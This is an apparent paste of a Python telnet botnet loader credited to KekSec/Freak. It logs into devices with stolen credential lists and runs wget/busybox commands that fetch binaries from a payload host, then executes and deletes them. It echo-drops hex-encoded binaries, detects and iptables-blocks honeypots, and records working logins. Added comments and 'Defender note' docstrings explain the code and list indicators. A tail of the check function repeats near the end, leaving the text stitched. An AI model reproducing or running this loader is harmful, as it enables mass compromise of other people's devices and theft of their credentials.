KekSec

FREAKS TELNET ECHOLOADER - 250K VIEWS SPECIAL

Feb 10th, 2021 (edited)
  1. #!/usr/bin/python
  2. #Phaaaat hax telnet loader by Freak/Milenko
  3. #this loader actively detects honeypots using incorrect user agents when requesting bins.
  4. #it will actively block any detected honeypot with iptables.
  5. #USAGE(S):
  6.  
  7. #ANTI HONEYPOT MODE:
  8. #cat list.txt | python loader.py 1 8081
  9.  
  10. #DUMBASS MODE
  11. #cat list.txt | python loader.py 0
  12.  
  13. #SELFREP MODE (recommended) configure capsaicin for scanlisten port
  14. #ncat -kvlp scanlistenport | python loader.py 1 8081
  15.  
  16. import sys, re, os, socket, time, select,sys
  17. from threading import Thread
# --- Operator configuration and payload command list ---
# Host that serves the payload binaries. "1.3.3.7" is the value as published
# in this paste.
serverip = "1.3.3.7"
# URL path prefix of the per-architecture binaries on that host.
binprefix = "/bins/keksec"
# Last path component of binprefix ("keksec"); used below as the file-name
# stem for the chmod / execute / rm steps.
binname = binprefix.split("/")[-1]
# Shell commands that infect() sends, one line at a time, to a device after a
# login whose shell answered the marker test. The first two lines change into
# a writable directory. Every following line handles one CPU architecture
# (mips, mpsl, sh4, x86, arm7, x64, ppc, i586, m68k, spc, arm, arm5,
# ppc-440fp): fetch http://<serverip>/bins/keksec.<arch> with wget and again
# with busybox wget, chmod 777 the file, execute it, then delete it (rm -f).
# Defender note: the artefacts this leaves are HTTP GETs for
# /bins/keksec.<arch>, short-lived keksec.<arch> files in /tmp, /var/run,
# /mnt, /root or /, and a chmod 777 immediately followed by execution and
# deletion of the same file.
rekdevice = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
cd /tmp || cd $(find / -writable | head -n 1);
wget http://""" + serverip + binprefix + """.mips -O keksec.mips; busybox wget http://""" + serverip + binprefix + """.mips -O keksec.mips; chmod 777 """ + binname + """.mips; ./""" + binname + """.mips; rm -f """ + binname + """.mips
wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; busybox wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; chmod 777 """ + binname + """.mpsl; ./""" + binname + """.mpsl; rm -f """ + binname + """.mpsl
wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; busybox wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; chmod 777 """ + binname + """.sh4; ./""" + binname + """.sh4; rm -f """ + binname + """.sh4
wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; busybox wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; chmod 777 """ + binname + """.x86; ./""" + binname + """.x86; rm -f """ + binname + """.x86
wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; busybox wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; chmod 777 """ + binname + """.arm7; ./""" + binname + """.arm7; rm -f """ + binname + """.arm7
wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; busybox wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; chmod 777 """ + binname + """.x64; ./""" + binname + """.x64; rm -f """ + binname + """.x64
wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; busybox wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; chmod 777 """ + binname + """.ppc; ./""" + binname + """.ppc; rm -f """ + binname + """.ppc
wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; busybox wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; chmod 777 """ + binname + """.i586; ./""" + binname + """.i586; rm -f """ + binname + """.i586
wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; busybox wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; chmod 777 """ + binname + """.m68k; ./""" + binname + """.m68k; rm -f """ + binname + """.m68k
wget http://""" + serverip + binprefix + """.spc -O keksec.spc; busybox wget http://""" + serverip + binprefix + """.spc -O keksec.spc; chmod 777 """ + binname + """.spc; ./""" + binname + """.spc; rm -f """ + binname + """.spc
wget http://""" + serverip + binprefix + """.arm -O keksec.arm; busybox wget http://""" + serverip + binprefix + """.arm -O keksec.arm; chmod 777 """ + binname + """.arm; ./""" + binname + """.arm; rm -f """ + binname + """.arm
wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; busybox wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; chmod 777 """ + binname + """.arm5; ./""" + binname + """.arm5; rm -f """ + binname + """.arm5
wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; busybox wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; chmod 777 """ + binname + """.ppc-440fp; ./""" + binname + """.ppc-440fp; rm -f """ + binname + """.ppc-440fp"""
# Turn the block above into a list with one command string per line.
rekdevice = rekdevice.replace("\r", "").split("\n")

# Append-mode log file; infect() writes one "ip:23 user:pass" line to it for
# each login whose shell echoed the marker.
global fh
fh = open("bots.txt","a+")
  40.  
def chunkify(lst, n):
    """Deal *lst* into *n* interleaved slices.

    Slice k holds items k, k+n, k+2n, ... of *lst*. Nothing else in the
    visible listing calls this helper.
    """
    strided = []
    for offset in xrange(n):
        strided.append(lst[offset::n])
    return strided
  43.  
# Number of check() workers currently alive; check() increments it on entry
# and decrements it on exit, and the main loop reads it for throttling.
running = 0

# Addresses for which the echo-based drop reported "FIN"; infect() returns
# immediately for any address found here.
echoed = []

# Progress counters updated by infect() and printed by printStatus().
# (Module-level `global` statements are no-ops and are omitted.)
tftp = wget = echo = logins = ran = 0
def printStatus():
    """Print the global progress counters every five seconds, forever."""
    # The counters are only read here, so no `global` declarations are needed.
    while True:
        time.sleep(5)
        status = "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + "     Ran:" + str(ran) + "  Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
        print status
  66.  
def readUntil(tn, advances, timeout=8):
    """Collect data from *tn* until one of *advances* shows up.

    Calls tn.recv(1024) repeatedly, pausing 0.1 s after each read, and returns
    everything received as soon as any element of *advances* occurs in it.
    Returns "" when *timeout* seconds have passed; the clock is only checked
    between reads.
    """
    received = ''
    began = time.time()
    while True:
        if time.time() - began >= timeout:
            return ""
        received += tn.recv(1024)
        time.sleep(0.1)
        if any(marker in received for marker in advances):
            return received
  76.  
def recvTimeout(sock, size, timeout=8):
    """Return up to *size* bytes from *sock*, or "" if none arrive in time.

    Puts the socket in non-blocking mode, waits up to *timeout* seconds with
    select() for it to become readable, and performs a single recv().
    """
    sock.setblocking(0)
    readable, _, _ = select.select([sock], [], [], timeout)
    if not readable:
        return ""
    return sock.recv(size)
  84.  
def contains(data, array):
    """Return True when any element of *array* occurs in *data*, else False."""
    return any(needle in data for needle in array)
  90.  
def split_bytes(s, n):
    """Yield consecutive slices of *s*, each at most *n* items long.

    *n* must be at least 4; the assertion fires when iteration starts. The
    last slice carries whatever remains and an empty *s* yields nothing.
    """
    assert n >= 4
    total = len(s)
    for offset in range(0, total, n):
        yield s[offset:offset + n]
  103.  
# Source addresses that clientHandler() flagged because their request to the
# check listener contained neither "curl" nor "Wget"; infect() abandons a
# target whose address is in this list.
badips = []
def fileread():
    """Return the full contents of honeypots.txt, read in binary mode."""
    handle = open("honeypots.txt", "rb")
    contents = handle.read()
    handle.close()
    return contents
def clientHandler(c, addr):
    """Serve one connection to the honeypot-check listener.

    c is the accepted socket and addr its (ip, port) pair. A client that is
    not yet flagged has its first request read and searched for the
    substrings "curl" and "Wget". If neither is present the address is
    appended to honeypots.txt, dropped with an iptables rule on the loader
    host, added to badips, and sent an abusive line plus random bytes. A
    client that was already flagged gets the same line and random bytes
    without being read. Every exception is swallowed.

    Defender note: this is the check described in the file header. A
    sandbox or honeypot that fetches the advertised URL with a client whose
    request carries neither marker is recorded here, and infect() then skips
    that address.
    """
    global badips
    try:
        # Known-bad means: flagged during this run (badips) or listed in
        # honeypots.txt from an earlier run.
        if addr[0] not in badips and addr[0] not in fileread():
            print addr[0] + ":" + str(addr[1]) + " has connected!"
            request = recvTimeout(c, 8912)
            # A request carrying "curl" or "Wget" passes; nothing is sent back
            # to such a client and the socket is closed below.
            if "curl" not in request and "Wget" not in request:
                if addr[0] not in fileread():
                    fh=open("honeypots.txt", "a")
                    fh.write(addr[0]+"\n")
                    fh.close()
                    # Appends an INPUT rule dropping all traffic from this
                    # source on the host running the loader.
                    os.popen("iptables -A INPUT -s " + addr[0] + " -j DROP")
                badips.append(addr[0])
                print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
                c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
                # Ten sends of 131070 random bytes each (about 1.3 MB total).
                for i in range(10):
                    c.send(os.urandom(65535*2))
        else:
            # Already flagged: same reply, without reading the request.
            c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
            for i in range(10):
                c.send(os.urandom(65535*2))
        c.close()
    except Exception as e:
        #print str(e)
        pass
  136.  
def honeyserver(honeyport):
    """Run the honeypot-check listener on TCP port honeyport.

    Binds to all interfaces ('' as the host), accepts connections forever and
    hands each one to clientHandler() on its own thread. Errors from accept()
    or thread start are swallowed and the loop continues.

    Defender note: a loader host in mode "1" therefore exposes this extra
    listening port in addition to the web server that hosts the binaries.
    """
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('', honeyport))
    s.listen(999999999)
    while 1:
        try:
            c, addr = s.accept()
            Thread(target=clientHandler, args=(c, addr,)).start()
        except:
            pass
# Mode "1" (the ANTI HONEYPOT and SELFREP usages in the header): start the
# honeypot-check listener on the port given as the second argument.
# sys.argv[1] is read unconditionally, so the script expects at least one
# command-line argument.
if sys.argv[1]=="1":
    Thread(target=honeyserver, args=(int(sys.argv[2]),)).start()
  150.  
def infect(ip, username, password):
    """Log in to ip over telnet with one credential pair and push the payload.

    Stages, in order: TCP connect to port 23, answer two ":" prompts with
    username and password, confirm a shell by having it print an "AK47"
    marker, optionally run the honeypot check (mode "1"), send the rekdevice
    download commands, then write small dlr.<arch> binaries through echo.
    Returns None on every path; results are recorded in the global counters
    and in bots.txt, infected.txt and echoes.txt.

    Defender note: strings that appear on the wire or on the device and can
    be matched on are the "AK47" echo test, the file names updDl,
    gsdfsdf424r24 and .keksec, requests for /bins/keksec.<arch> and
    /bins/mirai.arm, and long runs of echo -ne '\\x..' lines in a telnet
    session.
    """
    global badips
    global echo
    global tftp
    global wget
    global logins
    global ran
    global echoed
    # Hosts for which the echo path already reported "FIN" are not contacted
    # again.
    if ip in echoed:
        return
    # Marker searched for in device output; a hit is counted in `ran` and
    # logged to infected.txt. Presumably printed by the payload once it runs -
    # the payload is not part of this file.
    infectedkey = "CAPSAICIN"
    try:
        tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tn.settimeout(1)
        # The session always goes to TCP 23, whichever port check() probed.
        tn.connect((ip, 23))
    except:
        try:
            tn.close()
        except:
            pass
        return
    try:
        # Login dialogue: wait for text containing ":" and answer with the
        # username, then do the same for the password.
        hoho = ''
        hoho += readUntil(tn, ":")
        if ":" in hoho:
            tn.send(username + "\n")
            time.sleep(0.1)
        hoho = ''
        hoho += readUntil(tn, ":")
        if ":" in hoho:
            tn.send(password + "\n")
            time.sleep(0.8)
        else:
            pass
        # Anything that looks like a prompt (#, $, @ or >) counts as a
        # successful login; otherwise the session is dropped.
        prompt = ''
        prompt += recvTimeout(tn, 8192)
        if ">" in prompt and "ONT" not in prompt:
            success = True
        elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
            success = True
        else:
            tn.close()
            return
    except:
        tn.close()
        return
    if success == True:
        try:
            # Four commands sent blind (presumably to get from a restricted
            # vendor CLI to a shell - not verified here), then a shell test:
            # the marker is sent as hex escapes, so the literal text "AK47"
            # only comes back if something interpreted the echo.
            tn.send("enable\r\n")
            tn.send("system\r\n")
            tn.send("shell\r\n")
            tn.send("sh\r\n")
            tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
        except:
            tn.close()
            return
        time.sleep(1)
        try:
            buf = recvTimeout(tn, 8192)
        except:
            tn.close()
            return
        if "AK47" in buf:
            if sys.argv[1] == "1":
                # Honeypot check: have the device request /bins/mirai.arm from
                # the check listener (serverip, port argv[2]) with wget and
                # with curl, wait three seconds, then abandon the target if
                # clientHandler() put its address in badips.
                tn.send("wget http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
                tn.send("curl http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
                time.sleep(3)
                recvTimeout(tn, 8192)
                if ip in badips:
                    return
            print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
            logins += 1
            # Working credentials are appended to bots.txt (module-level fh).
            fh.write(ip + ":23 " + username + ":" + password + "\n")
            fh.flush()
            # Stage 1: send each download-and-run command, wait three seconds
            # and classify the output by substring.
            for rek in rekdevice:
                tn.send(rek + "\r\n")
                time.sleep(3)
                buf = recvTimeout(tn, 1024*1024)
                loaded = False
                if "bytes" in buf:
                    print "\033[32m[\033[31m+\033[32m] \033[33mwget \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
                    tftp += 1
                    loaded = True
                elif "saved" in buf:
                    print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
                    wget += 1
                    loaded = True
                if infectedkey in buf:
                    ran += 1
                    print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
                    f=open("infected.txt", "a")
                    f.write(ip +":23 " + username + ":" + password + "\r\n")
                    f.close()
            #if loaded:
            #    tn.close()
            #    return
            # Stage 2 runs regardless of the stage 1 outcome (the early exit
            # above is commented out). It first looks for a writable mount.
            tn.send("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /\r\n")
            tn.send("cat /proc/mounts;busybox cat /proc/mounts\r\n")
            mounts = recvTimeout(tn, 1024*1024)
            for line in mounts.split("\n"):
                try:
                    # Second space-separated field of a /proc/mounts line is
                    # the mount point; only lines containing " rw" are tried.
                    path = line.split(" ")[1]
                    if " rw" in line:
                        # Command template: write the AK47 marker to
                        # <mount>/.keksec, read it back and remove it. Any
                        # exception raised in this try block is swallowed and
                        # the next mount line is processed.
                        tn.send("echo -e '%s' > %s/.keksec; cat %s/.keksec;busybox cat %s/.keksec; rm %s/.keksec;busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
                        if "AK47" in recvTimeout(tn, 1024*1024):
                            tn.send("cd %s\r\n" % path) #cd into the writeable directory
                except:
                    continue
            # Echo drop: for each local bins/dlr.<arch> file, send its bytes
            # as '\xNN' escapes in 128-byte pieces through `echo -ne` into a
            # file named updDl on the device, mark it executable, run it and
            # delete it.
            for binary in "dlr.arm dlr.arm7 dlr.mips dlr.x86 dlr.mpsl dlr.m68k dlr.sh4 dlr.ppc dlr.spc".split(" "):
                try:
                    first = True
                    count = 0
                    hexdata = []
                    for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
                        hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
                    parts = len(hexdata)
                    for hexchunk in hexdata:
                        # First piece truncates updDl (">"), later pieces
                        # append (">>").
                        seq = ">" if first else ">>"
                        tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")#;busybox echo -ne '" + hexchunk + "' " + seq + "\r\n")
                        first = False
                        count += 1
                        time.sleep(0.01)
                    print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
                    tn.send("chmod 777 updDl;busybox chmod 777 updDl\r\n")
                    tn.send("./updDl\r\n")
                    time.sleep(5)
                    tn.send("rm -rf ./updDl\r\n")
                    time.sleep(0.1)
                    # gsdfsdf424r24 is then executed and removed; presumably
                    # it is the file the dlr stub leaves behind - the stub is
                    # not part of this listing.
                    tn.send("./gsdfsdf424r24\r\n") #change this to dvrHelper if using mirai
                    time.sleep(1)
                    tn.send("rm -rf ./gsdfsdf424r24\r\n") #and this
                    buf = recvTimeout(tn, 1024*1024)
                    # "FIN" in the output is counted as a completed echo drop:
                    # the target is logged to echoes.txt and remembered in
                    # echoed.
                    if "FIN" in buf:
                        echo += 1
                        print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
                        tn.close()
                        f=open("echoes.txt","a")
                        f.write(ip +":23 " + username + ":" + password + "\r\n")
                        f.close()
                        echoed.append(ip)
                    if infectedkey in buf:
                        ran += 1
                        f=open("infected.txt", "a")
                        f.write(ip +":23 " + username + ":" + password + "\r\n")
                        f.close()
                        print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
                        tn.close()
                        return
                except Exception as e:
#                        print str(e)
                    # Any failure for one architecture ends the whole attempt.
                    return
    else:
#        tn.close()
        return
  305.  
def check(chunk, fh):
    """Worker: parse each entry in chunk, probe the port, then call infect().

    Entry shapes accepted by the parsing below: "ip:23 user:pass",
    "ip:2323 user:pass", "ip:user:pass" and "user:pass:ip". Entries that fit
    none of them are skipped. fh is accepted but not used in this function;
    infect() writes through the module-level fh.
    """
    global running
    # running counts live workers; the main loop reads it for throttling.
    running += 1
    threadID = running
    for login in chunk:
        try:
            port = 23
            # "ip:PORT user:pass" is normalised to "ip:user:pass", keeping the
            # port for the reachability probe.
            if ":23 " in login:
                login = login.replace(":23 ", ":")
                port = 23
            if ":2323 " in login:
                login = login.replace(":2323 ", ":")
                port = 2323
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            try:
                # inet_aton() raises for a non-address, which selects between
                # the ip-first and ip-last layouts.
                socket.inet_aton(login.split(":")[0])
                ip = login.split(":")[0]
                username = login.split(":")[1]
                password = login.split(":")[2]
            except:
                 try:
                    socket.inet_aton(login.split(":")[2])
                    ip = login.split(":")[2]
                    username = login.split(":")[0]
                    password = login.split(":")[1]
                 except:
                     continue
            # One-second TCP connect as a reachability probe; the socket is
            # closed again and infect() opens its own connection.
            s.connect((ip, port))
            s.close()
            infect(ip, username, password)
        except:
            pass
    running -= 1
  330.                     username = login.split(":")[0]
  331.                     password = login.split(":")[1]
  332.                  except:
  333.                      continue
  334.             s.connect((ip, port))
  335.             s.close()
  336.             infect(ip, username, password)
  337.         except:
  338.             pass
  339.     running -= 1
  340.  
  341. while 1:
  342.     if running >= 512:
  343.         time.sleep(0.3)
  344.     try:
  345.         Thread(target = check, args = ([raw_input()], fh,)).start()
  346.     except KeyboardInterrupt:
  347.         os.kill(os.getpid(), 9)
  348.     except Exception:
  349.         pass
  350.  